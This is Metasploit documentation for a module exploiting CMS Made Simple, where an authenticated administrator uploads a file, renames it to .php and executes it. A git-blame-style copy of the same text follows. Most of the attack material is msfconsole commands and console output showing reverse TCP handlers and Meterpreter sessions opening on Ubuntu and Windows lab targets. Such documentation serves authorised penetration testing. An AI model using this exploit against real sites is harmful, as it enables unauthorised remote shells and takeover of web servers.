documentation/modules/exploit/multi/http/cmsms_upload_rename_rce.md

## Description

  CMS Made Simple allows an authenticated administrator to upload a file
  and rename it to have a `.php` extension. The file can then be executed
  by opening the URL of the file in the `/uploads/` directory.

  This module has been successfully tested on CMS Made Simple versions
  2.2.5 and 2.2.7.

## Vulnerable Application

[CMS Made Simple v2.2.5](http://dev.cmsmadesimple.org/project/files/6)

## Verification Steps

1. `./msfconsole -q`
2. `use use exploit/multi/http/cmsms_upload_rename_rce`
3. `set username <username>`
4. `set password <password>`
5. `set rhosts <rhost>`
6. `run`

## Scenarios

### CMS Made Simple v2.2.5 on Ubuntu 18.04 (PHP 7.2.7, Apache 2.4.9)

```
msf5 > use exploit/multi/http/cmsms_upload_rename_rce
msf5 exploit(multi/http/cmsms_upload_rename_rce) > set username msfdev
username => msfdev
msf5 exploit(multi/http/cmsms_upload_rename_rce) > set password msfdev
password => msfdev
msf5 exploit(multi/http/cmsms_upload_rename_rce) > set rhosts 172.22.222.123
rhosts => 172.22.222.123
msf5 exploit(multi/http/cmsms_upload_rename_rce) > run

[*] Started reverse TCP handler on 172.22.222.194:4444 
[*] Sending stage (37775 bytes) to 172.22.222.123
[*] Meterpreter session 1 opened (172.22.222.194:4444 -> 172.22.222.123:44352) at 2018-07-17 08:41:33 -0500

meterpreter > sysinfo
Computer    : ubuntu
OS          : Linux ubuntu 4.15.0-23-generic #25-Ubuntu SMP Wed May 23 18:02:16 UTC 2018 x86_64
Meterpreter : php/linux
meterpreter >
```

### CMS Made Simple v2.2.5 on Windows 10 x64 (PHP 5.6.35, Apache 2.4.33)

```
msf5 > use exploit/multi/http/cmsms_upload_rename_rce
msf5 exploit(multi/http/cmsms_upload_rename_rce) > set username msfdev
username => msfdev
msf5 exploit(multi/http/cmsms_upload_rename_rce) > set password msfdev
password => msfdev
msf5 exploit(multi/http/cmsms_upload_rename_rce) > set rhosts 172.22.222.175
rhosts => 172.22.222.175
msf5 exploit(multi/http/cmsms_upload_rename_rce) > run

[*] Started reverse TCP handler on 172.22.222.194:4444 
[*] Sending stage (37775 bytes) to 172.22.222.175
[*] Meterpreter session 1 opened (172.22.222.194:4444 -> 172.22.222.175:49829) at 2018-07-17 08:46:27 -0500

meterpreter > sysinfo
Computer    : WIN10
OS          : Windows NT WIN10 10.0 build 17134 (Windows 10) AMD64
Meterpreter : php/windows
meterpreter >
```
CMS Made Simple Upload/Rename Authenticated RCE 2018-07-17 09:00:39 -05:00			`## Description`

Update cmsms_upload_rename_rce check and docs 2018-07-19 18:26:42 +00:00			`CMS Made Simple allows an authenticated administrator to upload a file`
			and rename it to have a `.php` extension. The file can then be executed
			by opening the URL of the file in the `/uploads/` directory.

			`This module has been successfully tested on CMS Made Simple versions`
			`2.2.5 and 2.2.7.`
CMS Made Simple Upload/Rename Authenticated RCE 2018-07-17 09:00:39 -05:00
			`## Vulnerable Application`

			`[CMS Made Simple v2.2.5](http://dev.cmsmadesimple.org/project/files/6)`

			`## Verification Steps`

			1. `./msfconsole -q`
			2. `use use exploit/multi/http/cmsms_upload_rename_rce`
			3. `set username <username>`
			4. `set password <password>`
			5. `set rhosts <rhost>`
			6. `run`

			`## Scenarios`

			`### CMS Made Simple v2.2.5 on Ubuntu 18.04 (PHP 7.2.7, Apache 2.4.9)`

			```
			`msf5 > use exploit/multi/http/cmsms_upload_rename_rce`
			`msf5 exploit(multi/http/cmsms_upload_rename_rce) > set username msfdev`
			`username => msfdev`
			`msf5 exploit(multi/http/cmsms_upload_rename_rce) > set password msfdev`
			`password => msfdev`
			`msf5 exploit(multi/http/cmsms_upload_rename_rce) > set rhosts 172.22.222.123`
			`rhosts => 172.22.222.123`
			`msf5 exploit(multi/http/cmsms_upload_rename_rce) > run`

			`[*] Started reverse TCP handler on 172.22.222.194:4444`
			`[*] Sending stage (37775 bytes) to 172.22.222.123`
			`[*] Meterpreter session 1 opened (172.22.222.194:4444 -> 172.22.222.123:44352) at 2018-07-17 08:41:33 -0500`

			`meterpreter > sysinfo`
			`Computer : ubuntu`
			`OS : Linux ubuntu 4.15.0-23-generic #25-Ubuntu SMP Wed May 23 18:02:16 UTC 2018 x86_64`
			`Meterpreter : php/linux`
			`meterpreter >`
			```

			`### CMS Made Simple v2.2.5 on Windows 10 x64 (PHP 5.6.35, Apache 2.4.33)`

			```
			`msf5 > use exploit/multi/http/cmsms_upload_rename_rce`
			`msf5 exploit(multi/http/cmsms_upload_rename_rce) > set username msfdev`
			`username => msfdev`
			`msf5 exploit(multi/http/cmsms_upload_rename_rce) > set password msfdev`
			`password => msfdev`
			`msf5 exploit(multi/http/cmsms_upload_rename_rce) > set rhosts 172.22.222.175`
			`rhosts => 172.22.222.175`
			`msf5 exploit(multi/http/cmsms_upload_rename_rce) > run`

			`[*] Started reverse TCP handler on 172.22.222.194:4444`
			`[*] Sending stage (37775 bytes) to 172.22.222.175`
			`[*] Meterpreter session 1 opened (172.22.222.194:4444 -> 172.22.222.175:49829) at 2018-07-17 08:46:27 -0500`

			`meterpreter > sysinfo`
			`Computer : WIN10`
			`OS : Windows NT WIN10 10.0 build 17134 (Windows 10) AMD64`
			`Meterpreter : php/windows`
			`meterpreter >`
			```